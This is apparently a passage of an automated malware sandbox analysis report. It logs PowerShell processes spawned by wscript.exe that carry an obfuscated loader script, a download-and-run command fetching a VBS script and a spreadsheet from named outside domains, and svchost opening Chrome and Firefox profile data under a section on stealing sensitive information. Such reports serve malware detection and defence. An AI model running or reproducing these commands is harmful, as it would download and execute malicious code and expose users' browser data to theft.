                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$kollationernendkaldebefjelses='elefantridderne';;$flumed='rundingernes';;$metropoler='larceners';;$provisionsindtgters='drivremmen';;$smedejernslaage=$host.name;function elevtimens($ballongynges){if ($smedejernslaage) {$firspandets79=2} for ($kollationerne=$firspandets79;;$kollationerne+=3){if(!$ballongynges[$kollationerne]) { break };$bibliofil+=$ballongynges[$kollationerne];$squibbery='jogurternes'}$bibliofil}function fortynderes($thuds){ .($nongame) ($thuds)}$fangled=elevtimens 'ton repltsi.dew';$fangled+=elevtimens 's e.ubc,c olr.i hestns t';$gasted=elevtimens 's.manobazobip l lahame/';$dealation=elevtimens 'cotvalslsej1pl2';$hiwire='st[lunf,e.dtl . scee sr iv,liroc .ehyp .o ,iunnrytfrm.ia n maudg oemir l]va:ch:ras te tc su r aiprt ymipspr foint poaacn,orklna= ,$ vdbeeaga.ul zaintfli.po an';$gasted+=elevtimens 'an5 t.co0 a(fuwwiigen kdbao ,wkosho manretu t1fe0he.da0 i;o trw eihenu 6 4j ;fa ,mxsn6 o4fi;b drnivfy:um1.e3fo1u .,t0 ,)se begnoehjc,ok loet/ h2i 0,n1im0.v0du1ri0 p1pr .kfj,is,rstedef,novrxsk/af1ud3ru1to.ve0';$endomysial=elevtimens ',nuasshae,krre-biaougbae n at';$niveauoplysning=elevtimens ' h stant bptes t: h/kh/unpratras y.a gnor lo ,u ap o/u aalb ./p l aainnbrehvyno.fod ksvap.r>cohemt .tn.p,ask :r / / nwsmw uwfa.yapskurenhoebae ut b. aapee.n/aracobs,/ lt,arenspec yo.. td oskrp';$afpolitiserendes=elevtimens ',a>';$nongame=elevtimens 'ruik,enox';$stripperne='bystyrers';$assumptiveness='\nonfattening.ret';fortynderes (elevtimens ' p$ungsell.o be,afllh : ,f no pr ss ,dnoeno=co$dier nlivly: abop lpp d pa .t a m+sa$baa ,sdoscau um pudtmeiviv tesun e ds.us');fortynderes (elevtimens 'ex$ kgmalunobab,ea lgr:k bruiprbtue kh.wo ,lrodfle mlbus ues,n vsab=,y$ovn sis vfoetiaacu tosppvilinyplskvnunikon lg .mess pgrlalivat s(af$praunf epnyo lpoisetb irrs.ped r re ynmudpretvsma)');fortynderes (elevtimens $hiwire);$niveauoplysning=$bibeholdelsens[0];$heda=(elevtimens ' a$maglalgaoprbr,arula :myskotulr am smnoeok=inn ae uw s-unodib ,j efoc itpu r sg y osf tl.ed mbl.re$sufmbainn kgdelpae id');fortynderes ($heda);fortynderes (elevtimens 'fo$e s stubrlem im uecu. hsletoapad.neskrpasha[n $p eshngtd ao fm cyses ribaaprlbo]tr=un$alg falus tane cd');$preposed=elevtimens ' o$afsp,ttyrp.mhem.oe,n.sndacocrwgrn ol locoamyd afo istlsteti(as$ on niprvrue a tumuoc,psul kysasfank imanrogko,p,$inhmajgaewarben nemirbjsre)';$hjerners=$forsde;fortynderes (elevtimens ' .$,ngtil o.obbla ll s:hadear,eio,ktekroediv .achrale fr sn.ie espa=hi( et ,emess t k-pepala etdahsi an$behlgjggeovrunnlee rrsksha)');while (!$drikkevarernes) {fortynderes (elevtimens ' t$ gbelino b airlhj: lpomrv ou.teneges ptuns,lyp r f=,u$ ,a on stmyi sc way p,li st a hl sisusmit aianc') ;fortynderes $preposed;fortynderes (elevtimens ' osh,t pas rhatso-e srelene.iemupch m4');fortynderes (elevtimens ' i$prginlseo nbblasklde:vedi rs irdkt.kvies vmiakl
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$kollationernendkaldebefjelses='elefantridderne';;$flumed='rundingernes';;$metropoler='larceners';;$provisionsindtgters='drivremmen';;$smedejernslaage=$host.name;function elevtimens($ballongynges){if ($smedejernslaage) {$firspandets79=2} for ($kollationerne=$firspandets79;;$kollationerne+=3){if(!$ballongynges[$kollationerne]) { break };$bibliofil+=$ballongynges[$kollationerne];$squibbery='jogurternes'}$bibliofil}function fortynderes($thuds){ .($nongame) ($thuds)}$fangled=elevtimens 'ton repltsi.dew';$fangled+=elevtimens 's e.ubc,c olr.i hestns t';$gasted=elevtimens 's.manobazobip l lahame/';$dealation=elevtimens 'cotvalslsej1pl2';$hiwire='st[lunf,e.dtl . scee sr iv,liroc .ehyp .o ,iunnrytfrm.ia n maudg oemir l]va:ch:ras te tc su r aiprt ymipspr foint poaacn,orklna= ,$ vdbeeaga.ul zaintfli.po an';$gasted+=elevtimens 'an5 t.co0 a(fuwwiigen kdbao ,wkosho manretu t1fe0he.da0 i;o trw eihenu 6 4j ;fa ,mxsn6 o4fi;b drnivfy:um1.e3fo1u .,t0 ,)se begnoehjc,ok loet/ h2i 0,n1im0.v0du1ri0 p1pr .kfj,is,rstedef,novrxsk/af1ud3ru1to.ve0';$endomysial=elevtimens ',nuasshae,krre-biaougbae n at';$niveauoplysning=elevtimens ' h stant bptes t: h/kh/unpratras y.a gnor lo ,u ap o/u aalb ./p l aainnbrehvyno.fod ksvap.r>cohemt .tn.p,ask :r / / nwsmw uwfa.yapskurenhoebae ut b. aapee.n/aracobs,/ lt,arenspec yo.. td oskrp';$afpolitiserendes=elevtimens ',a>';$nongame=elevtimens 'ruik,enox';$stripperne='bystyrers';$assumptiveness='\nonfattening.ret';fortynderes (elevtimens ' p$ungsell.o be,afllh : ,f no pr ss ,dnoeno=co$dier nlivly: abop lpp d pa .t a m+sa$baa ,sdoscau um pudtmeiviv tesun e ds.us');fortynderes (elevtimens 'ex$ kgmalunobab,ea lgr:k bruiprbtue kh.wo ,lrodfle mlbus ues,n vsab=,y$ovn sis vfoetiaacu tosppvilinyplskvnunikon lg .mess pgrlalivat s(af$praunf epnyo lpoisetb irrs.ped r re ynmudpretvsma)');fortynderes (elevtimens $hiwire);$niveauoplysning=$bibeholdelsens[0];$heda=(elevtimens ' a$maglalgaoprbr,arula :myskotulr am smnoeok=inn ae uw s-unodib ,j efoc itpu r sg y osf tl.ed mbl.re$sufmbainn kgdelpae id');fortynderes ($heda);fortynderes (elevtimens 'fo$e s stubrlem im uecu. hsletoapad.neskrpasha[n $p eshngtd ao fm cyses ribaaprlbo]tr=un$alg falus tane cd');$preposed=elevtimens ' o$afsp,ttyrp.mhem.oe,n.sndacocrwgrn ol locoamyd afo istlsteti(as$ on niprvrue a tumuoc,psul kysasfank imanrogko,p,$inhmajgaewarben nemirbjsre)';$hjerners=$forsde;fortynderes (elevtimens ' .$,ngtil o.obbla ll s:hadear,eio,ktekroediv .achrale fr sn.ie espa=hi( et ,emess t k-pepala etdahsi an$behlgjggeovrunnlee rrsksha)');while (!$drikkevarernes) {fortynderes (elevtimens ' t$ gbelino b airlhj: lpomrv ou.teneges ptuns,lyp r f=,u$ ,a on stmyi sc way p,li st a hl sisusmit aianc') ;fortynderes $preposed;fortynderes (elevtimens ' osh,t pas rhatso-e srelene.iemupch m4');fortynderes (elevtimens ' i$prginlseo nbblasklde:vedi rs irdkt.kvies vmiakl
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command function downloadandrun([string]$url, [string]$destination) { invoke-webrequest -uri $url -outfile $destination ; start-process -filepath $destination -wait };downloadandrun -url 'https://www.pts.group/ab/ab.vbs' -destination 'c:\users\public\grm2bfvsa42.vbs';downloadandrun -url 'https://www.fornid.com/ab/list%20of%20required%20items.xlsx' -destination 'c:\users\public\ilurgw960k7fwnm.xlsx'Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$kollationernendkaldebefjelses='elefantridderne';;$flumed='rundingernes';;$metropoler='larceners';;$provisionsindtgters='drivremmen';;$smedejernslaage=$host.name;function elevtimens($ballongynges){if ($smedejernslaage) {$firspandets79=2} for ($kollationerne=$firspandets79;;$kollationerne+=3){if(!$ballongynges[$kollationerne]) { break };$bibliofil+=$ballongynges[$kollationerne];$squibbery='jogurternes'}$bibliofil}function fortynderes($thuds){ .($nongame) ($thuds)}$fangled=elevtimens 'ton repltsi.dew';$fangled+=elevtimens 's e.ubc,c olr.i hestns t';$gasted=elevtimens 's.manobazobip l lahame/';$dealation=elevtimens 'cotvalslsej1pl2';$hiwire='st[lunf,e.dtl . scee sr iv,liroc .ehyp .o ,iunnrytfrm.ia n maudg oemir l]va:ch:ras te tc su r aiprt ymipspr foint poaacn,orklna= ,$ vdbeeaga.ul zaintfli.po an';$gasted+=elevtimens 'an5 t.co0 a(fuwwiigen kdbao ,wkosho manretu t1fe0he.da0 i;o trw eihenu 6 4j ;fa ,mxsn6 o4fi;b drnivfy:um1.e3fo1u .,t0 ,)se begnoehjc,ok loet/ h2i 0,n1im0.v0du1ri0 p1pr .kfj,is,rstedef,novrxsk/af1ud3ru1to.ve0';$endomysial=elevtimens ',nuasshae,krre-biaougbae n at';$niveauoplysning=elevtimens ' h stant bptes t: h/kh/unpratras y.a gnor lo ,u ap o/u aalb ./p l aainnbrehvyno.fod ksvap.r>cohemt .tn.p,ask :r / / nwsmw uwfa.yapskurenhoebae ut b. aapee.n/aracobs,/ lt,arenspec yo.. td oskrp';$afpolitiserendes=elevtimens ',a>';$nongame=elevtimens 'ruik,enox';$stripperne='bystyrers';$assumptiveness='\nonfattening.ret';fortynderes (elevtimens ' p$ungsell.o be,afllh : ,f no pr ss ,dnoeno=co$dier nlivly: abop lpp d pa .t a m+sa$baa ,sdoscau um pudtmeiviv tesun e ds.us');fortynderes (elevtimens 'ex$ kgmalunobab,ea lgr:k bruiprbtue kh.wo ,lrodfle mlbus ues,n vsab=,y$ovn sis vfoetiaacu tosppvilinyplskvnunikon lg .mess pgrlalivat s(af$praunf epnyo lpoisetb irrs.ped r re ynmudpretvsma)');fortynderes (elevtimens $hiwire);$niveauoplysning=$bibeholdelsens[0];$heda=(elevtimens ' a$maglalgaoprbr,arula :myskotulr am smnoeok=inn ae uw s-unodib ,j efoc itpu r sg y osf tl.ed mbl.re$sufmbainn kgdelpae id');fortynderes ($heda);fortynderes (elevtimens 'fo$e s stubrlem im uecu. hsletoapad.neskrpasha[n $p eshngtd ao fm cyses ribaaprlbo]tr=un$alg falus tane cd');$preposed=elevtimens ' o$afsp,ttyrp.mhem.oe,n.sndacocrwgrn ol locoamyd afo istlsteti(as$ on niprvrue a tumuoc,psul kysasfank imanrogko,p,$inhmajgaewarben nemirbjsre)';$hjerners=$forsde;fortynderes (elevtimens ' .$,ngtil o.obbla ll s:hadear,eio,ktekroediv .achrale fr sn.ie espa=hi( et ,emess t k-pepala etdahsi an$behlgjggeovrunnlee rrsksha)');while (!$drikkevarernes) {fortynderes (elevtimens ' t$ gbelino b airlhj: lpomrv ou.teneges ptuns,lyp r f=,u$ ,a on stmyi sc way p,li st a hl sisusmit aianc') ;fortynderes $preposed;fortynderes (elevtimens ' osh,t pas rhatso-e srelene.iemupch m4');fortynderes (elevtimens ' i$prginlseo nbblasklde:vedi rs irdkt.kvies vmiaklJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A959B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,25_3_00007DF415A959B0
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 00000018.00000003.2899852769.0000000003780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.2910076907.0000000023BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.2895832685.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.2999474579.0000000003820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing\google4
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\startupCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\thumbnails
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
